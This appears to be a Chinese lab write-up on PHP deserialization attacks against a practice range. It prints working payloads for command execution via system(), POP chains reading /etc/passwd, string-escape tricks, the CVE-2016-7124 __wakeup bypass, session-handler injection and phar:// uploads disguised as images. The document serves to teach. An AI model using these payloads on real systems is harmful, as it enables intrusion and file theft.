Bootstrap

php反序列化靶场随笔分析

前面讲了以下php基础,我们直接从class6开始实验

class6

访问页面,传一个序列化的字符串,php代码将其反序列化且调用对象的displayVar()方法
​
payload:
benben=O:4:"test":1:{s:1:"a";s:13:"system("id");";}
​
结果:
uid=33(www-data) gid=33(www-data) groups=33(www-data)

class7

__construct(): 类的构造函数,当创建类的实例时自动调用。
__destruct(): 类的析构函数,当对象被销毁时自动调用。
​
例题:传一个序列化字符串,php代码反序列化为对象,当对象销毁时调用__destruct()
​
payload:
benben=O:4:"User":1:{s:3:"cmd";s:13:"system("id");";}
​
结果:
uid=33(www-data) gid=33(www-data) groups=33(www-data)

class8

__sleep(): 执行serialize()时,先会调用这个函数。
​
传一个参数给对象,对象__sleep()方法调用system执行这个参数,然而php代码在序列化这个对象时,调用了__sleep()方法
​
payload:
benben=id
​
结果:
uid=33(www-data) gid=33(www-data) groups=33(www-data) N;
__wakeup(): 执行unserialize()时,先会调用这个函数。
​
传一个User 对象序列化后的字符串给参数,php代码会进行反序列化,触发__wakeup(),__wakeup()执行系统命令
​
payload:
benben=O:4:"User":2:{s:8:"username";s:2:"id";s:8:"nickname";N;}
​
结果:
uid=33(www-data) gid=33(www-data) groups=33(www-data)

class9&class10

__toString(): 类被当作字符串时的回应方法。
__invoke(): 以函数方式调用对象时的回应方法。 
__call(): 当调用对象中不可访问的方法时调用
__callStatic(): 以静态方式调用不可访问方法时调用。
__get(): 读取不可访问属性的值时调用(成员属性不存在)
__set(): 设置不可访问属性的值时调用。(给不存在的成员赋值)
__isset(): 当对不可访问属性调用isset()或empty()时调用。
__unset(): 当对不可访问属性调用unset()时调用。
__clone(): 当对象被克隆时调用。

class11

问题:如果遇到private的属性,在生成序列化的字符串时,如何为其赋值?
操作1:可以先将private修改为public,然后生成序列化的字符串后,在字符串中向这个属性添加类名和%00
操作2:直接给这个类添加一个构造函数,构造函数帮助我们给private属性赋值,赋完值后打印其序列化后的字符串
​
evil类创建对象作为index类创建的对象的test属性,然而index对象的test属性是private,(obj_index->$test = obj_evil)
​
payload:
O:5:"index":1:{s:4:"test";O:4:"evil":1:{s:5:"test2";s:13:"system("id");";}}
                      ^^^^^^^^
修改后:
O:5:"index":1:{s:11:"%00index%00test";O:4:"evil":1:{s:5:"test2";s:13:"system("id");";}}
                 ^^^^^^^^^^^^^^^^^^^^
<?php
// 这个对应操作1
// 将index对象的test属性修改为public或去掉修饰符
class index {
    var $test;
}
class evil {
    var $test2;
}
$obj1 = new evil();
$obj1->test2 = 'system("id");';
$obj2 = new index();
$obj2->test = $obj1;
echo serialize($obj2);
/*
输出结果:O:5:"index":1:{s:4:"test";O:4:"evil":1:{s:5:"test2";s:13:"system("id");";}}
                         ^^^^^^^^
修改后:O:5:"index":1:{s:11:"%00index%00test";O:4:"evil":1:{s:5:"test2";s:13:"system("id");";}}
                       ^^^^^^^^^^^^^^^^^^^^
*/
?>
<?php
// 这个对应操作2    
class index {
    private $test;
    public function __construct(){
        $this->test = new evil();
    }
}
class evil {
    var $test2 = 'system("id");'; 
}
$obj = new index();
echo serialize($obj);
/*
输出结果:O:5:"index":1:{s:11:"%00index%00test";O:4:"evil":1:{s:5:"test2";s:13:"system("id");";}}
*/
?>

class12

目标:输出sec中的tostring is here!
​
payload:
benben=O:4:"fast":1:{s:6:"source";O:3:"sec":1:{s:6:"benben";N;}}
<?php
class fast {
    public $source;
    public function __wakeup(){
        echo "wakeup is here!!";
        echo  $this->source;
    }
}
class sec {
    var $benben;
    public function __tostring(){
        echo "tostring is here!!";
    }
}
​
$obj1 = new sec();
$obj2 = new fast();
$obj2->source = $obj1;
echo serialize($obj2);
?>

class13

1.较为敏感的方法:Modifier类中__invoke能触发include($this->var)
​
2.Modifier对象中__invoke()方法能被Test对象__get魔术方法触发
​
3.Test对象__get()魔术方法能被Show对象中的__toString()方法触发
​
4.Show对象中的__toString()方法,能被另一个show对象的__wakeup()方法触发
​
5.unserialize触发show对象的__wakeup()方法
Show1对象反序列化触发wakeup魔术方法 ---------> Show2对象的__toString()方法--------->Test对象的__get魔术方法           --------->Modifier对象的__invoke方法--------->include($this->var)
<?php
class Modifier {
    public $par;
}
​
class Show{
    public $source;
    public $str;
}
​
class Test{
    public $p;
}
​
$obj1_Modifier = new Modifier();
$obj1_Modifier->par = '../../../../../../etc/passwd';
​
$obj1_Test = new Test();
$obj1_Test->p = $obj1_Modifier;
​
$obj1_Show = new Show();
$obj1_Show->str = $obj1_Test;
​
$obj2_Show = new Show();
$obj2_Show->source = $obj1_Show;
​
echo serialize($obj2_Show);
?>
payload:
O:4:"Show":2:{s:6:"source";O:4:"Show":2:{s:6:"source";N;s:3:"str";O:4:"Test":1:{s:1:"p";O:8:"Modifier":1:{s:3:"par";s:28:"../../../../../../etc/passwd";}}}s:3:"str";N;}
     ^^^^^
修改后:
O:4:"Show":2:{s:6:"source";O:4:"Show":2:{s:6:"source";N;s:3:"str";O:4:"Test":1:{s:1:"p";O:8:"Modifier":1:{s:13:"%00Modifier%00var";s:28:"../../../../../../etc/passwd";}}}s:3:"str";N;}
   ^^^^^^^^^^^^^^^^^^^^^

class14

对象序列化为字符串,字符串进行了过滤,过滤掉了"system()",导致字符串长度减少,因此字符串进行反序列化会失败。
那这种情况下,只要给出两个参数供攻击者输入,那么攻击者就能够控制所有属性(包括这两个属性之外的其他属性)
原理:参数1被过滤,导致序列化后v1的数值长度,与v1的实际长度不匹配,且大于实际长度,这时,构造参数2,让v1的值能一直覆盖到参数2来确保v1的数值长度和实际长度相匹配,然后再一次构造参数2用于构造其他属性,导致整个参数1和参数2的前面部分成为数值部分,而参数2的后面部分成为功能性代码
过滤条件:
"system()" -> ""        8 -> 0
​
结果:
O:1:"A":2:{s:2:"v1";s:n:"m个字符";s:2:"v2";s:x:"x个字符";}
                        
n = 参数1的长度,同时是v1的长度
x = 参数2的长度,不是v2的长度,因为其是属于v1的值,不是功能性代码
m = n被过滤后的长度
n = m + 13 + x的位数(通常是2位)+ 2 + 一个可控长度的字符串
n = m + 17 + 一个可控长度的字符串                                         
n至少比m多17个字符
​
输入n对应字符串(参数1):          system()system()system()        (n=24)(m=0)----->(根据:n = m + 17 + 一个可控长度的字符串,需要长度为7的可控字符串)
输入x对应字符串(参数2):          1234567";s:2:"v2";s:3:"123";}
                               ^^^^^^^^    ^^^^^^^^^^^^^^^^^
                            长度为7的可控字符串     我们构造的名为v2的属性
结果:
O:1:"A":2:{s:2:"v1";s:24:"system()system()system()";s:2:"v2";s:29:"1234567";s:2:"v2";s:3:"123";}";}
                          ^^^^^^^^^^^^^^^^^^^^^^^^                ^^^^^^^^^  
                          长度为n=24                             可控长度的字符串   
过滤后:
O:1:"A":2:{s:2:"v1";s:24:"";s:2:"v2";s:29:"1234567";s:2:"v2";s:3:"abc";}";}
                          ^^^^^^^^^^^^^^^^^^^^^^^^
                          长度为n=24
v1 = 'system()system()system()';
v2 = '1234567";s:2:"v2";s:3:"123";}';
​
O:1:"A":2:{s:2:"v1";s:27:"abc";s:2:"v2";s:29:"1234567";s:2:"v2";s:3:"123";}";}
​
object(A)#1 (2) {
  ["v1"]=>
  string(27) "";s:2:"v2";s:29:"1234567"
  ["v2"]=>
  string(3) "123"
}

class17(17是14的例题,所以放到前面)

过滤条件:
flag -> hk      4 -> 2
php  -> hk      3 -> 2
​
O:4:"test":3:{s:4:"user";s:n:"m个字符";s:4:"pass";s:x:"x个字符";s:3:"vip";b:0;}
​
n = 参数1的字符个数
m = n过滤后的字符的个数
x = 参数2字符个数
n = m + 15 + (x的位数,通常是2位) + 2 + 一个可控长度的字符串
n = m + 19 + 一个可控长度的字符串
​
所以n至少比m多19个字符
​
输入n对应字符串(参数1):      flagflagflagflagflagflagflagflagflagflag                (n=40)(m=20)---->(需要长度为1的可控字符串)
输入x对应字符串(参数2):      1";s:4:"pass";s:3:"123";s:3:"vip";b:1;}
                           ^^                      ^^^^^^^^^^^^^^^
                     长度为1的可控字符串              构造vip属性来控制vip属性的值
O:4:"test":3:{s:4:"user";s:40:"hkhkhkhkhkhkhkhkhkhk";s:4:"pass";s:39:"1";s:4:"pass";s:3:"123";s:3:"vip";b:1;}";s:3:"vip";b:0;}
​
​
object(test)#1 (3) {
  ["user"]=>
  string(40) "hkhkhkhkhkhkhkhkhkhk";s:4:"pass";s:39:"1"
  ["pass"]=>
  string(3) "123"
  ["vip"]=>
  bool(true)
}

class15

对序列化的字符串添加些字符,导致数值长度与实际长度不符
原理:通过构造第一个参数,使得参数的前面部分为数值,而后面部分作为功能性代码
添加条件:
ls -> pwd  (2 -> 3)
​
O:1:"A":2:{s:2:"v1";s:n:"m个字符";s:2:"v2";s:3:"123";}
​
n:参数1的长度,同时是v1的长度
m:n被添加后的长度
a:要构造其他参数的长度
n = m - a
​
要构造的字符串";s:2:"v2";s:3:"123";}
a=22
n = m - 22
​
参数 = lslslslslslslslslslslslslslslslslslslslslsls";s:2:"v2";s:3:"123;}
​
payload:
O:1:"A":2:{s:2:"v1";s:66:"lslslslslslslslslslslslslslslslslslslslslsls";s:2:"v2";s:3:"123";}";s:2:"v2";s:3:"123";}
添加后:
O:1:"A":2:{s:2:"v1";s:66:"pwdpwdpwdpwdpwdpwdpwdpwdpwdpwdpwdpwdpwdpwdpwdpwdpwdpwdpwdpwdpwdpwd";s:2:"v2";s:3:"123";}";s:2:"v2";s:3:"123";}

class16

添加条件:
php -> hack  (3 -> 4)
​
O:4:"test":2:{s:4:"user";s:3:"123";s:4:"pass";s:8:"daydream";}
​
n:参数1的长度,也是user的长度
m:n被增加后的长度
a:要构造的字符串的长度
n = m - a
​
要构造的字符串";s:4:"pass";s:8:"escaping";}
a = 29
n = m - 29
​
payload:
参数 = phpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphp";s:4:"pass";s:8:"escaping";}
添加后:
O:4:"test":2:{s:4:"user";s:116:"hackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhack";s:4:"pass";s:8:"escaping";}";s:4:"pass";s:8:"daydream";}

class18

__wakeup()魔术方法绕过(CVE-2016-7124)
​
序列化字符串中表示对象属性个数的值大于 真实的属性个数时会跳过__wakeup的执行
​
漏洞影响版本:
PHP5 < 5.6.25
PHP7 < 7.0.10
payload:
O:+6:"secret":2:{s:4:"file";s:25:"../../../../../etc/passwd";}
  ^           ^
这里绕过正则   这里绕过__wakeup的执行

class19

$obj->enter = &$obj->secret;
使用引用,使得$obj对象的enter和secret属性的值使用的是同一块内存
​
payload:
O:8:"just4fun":2:{s:5:"enter";N;s:6:"secret";R:2;}

class20

$_SESSION['benben'] = $_GET['ben'];
​
以上条件php会将获取到的ben值存储在session会话的benben属性,php先创建一个以session为名的文件,然后将ben进行序列化存储到这个文件中,例如:
​
当我们传递ben=1234时,存储的文件里的内容如下:
benben|s:4:"1234";
另外session属性存储进文件时有三种存储格式,以上演示的是php格式:
1.php格式:            键名+竖线+反序列化的属性
2.php_serialize格式:  反序列化的属性
3.php_binary格式:     二进制格式存储
​
第一种情况已经演示了,看第二种情况:
$_SESSION['benben'] = $_GET['ben'];
$_SESSION['b'] = $_GET['b'];
ben=123&b=456时,存储结果:
a:2:{s:6:"benben";s:3:"123";s:1:"b";s:3:"456";}
​
第三种情况:
ACKbenbens:3:"123";SOHbs:3:"456";
漏洞产生条件:session以php_serialize格式存储属性,而以php格式读取属性
漏洞原理:访问网页时,php后台代码是通过反序列化session对象来获取session属性的值
漏洞影响:我们向session属性中写入我们序列化好的对象,访问时会获取session并反序列化我们写的对象
​
访问save.php
$_SESSION['ben'] = $_GET['a'];
当提交a为如下字符串时
|O:1:"D":1:{s:1:"a";s:13:"system("ls");";}
文件存储内容如下,当以php格式解析并反序列化时
a:1:{s:3:"ben";s:42:"|O:1:"D":1:{s:1:"a";s:13:"system("ls");";}
^^^^^^^^^^^^^^^^^^^^^
竖线前的内容被认作键名,竖线后的内容被当作属性,而竖线后的内容我们可以构造
​
再访问vul.php将会执行恶意代码

class21

漏洞:还是上面的漏洞,提交时候用的是php_serialize格式,读的时候用的php格式
思路:构造payload提交(通过class20的save.php提交),使session属性存储在文件,然后再次访问
​
访问class20的save.php,payload如下:
|O:4:"Flag":2:{s:4:"name";N;s:3:"her";R:2;}
再次访问class21的index.php,他会自动获取session会话,并反序列化session的属性,我们通过payload将Flag对象写入session属性,导致其反序列化
​
ctfstu{5c202c62-7567-4fa0-a370-134fe9d16ce7}

class22

漏洞原理:生成的phar文件中,会将对象压缩成序列化的字符串,使用phar://协议加载文件时,会反序列化成为对象
漏洞条件:目标服务器能访问以phar://协议访问到你构造的phar文件
​
访问:http://localhost/class22/phar.php,会自动生成一个携带Testobj对象的phar文件
访问:http://localhost/class22/index.php,并传参:filename=phar://test.phar&a=phpinfo();
会反序列化phar文件中的Testobj对象

class23

class TestObject {
    public function __destruct() {
        include('flag.php');
        echo $flag;
    }
}
​
对TestObject进行反序列化自动获取flag,甚至不需要任何属性
<?php
//构造phar文件
highlight_file(__FILE__);
class TestObject
{ 
}
if (ini_get('phar.readonly') === 'On') {
    echo "phar.readonly is set to On";
} else {
    echo "phar.readonly is not set to On";
}
@unlink('test.phar');   //删除之前的test.par文件(如果有)
$phar=new Phar('test.phar');  //创建一个phar对象,文件名必须以phar为后缀
$phar->startBuffering();  //开始写文件
$phar->setStub('<?php __HALT_COMPILER(); ?>');  //写入stub
$o=new TestObject();
$phar->setMetadata($o);//写入meta-data
$phar->addFromString("test.txt","test");  //添加要压缩的文件
$phar->stopBuffering();
?>
以上代码获取phar文件后
访问http://localhost/class23/upload.php,上传图片,只能上传图片,就把后缀phar改为jpg/png
访问http://localhost/class23/index.php携带post参数file=phar://upload/test.jpg
会自动将test.jpg文件当作phar文件并反序列化,反序列化触发 __destruct()方法获取flag
;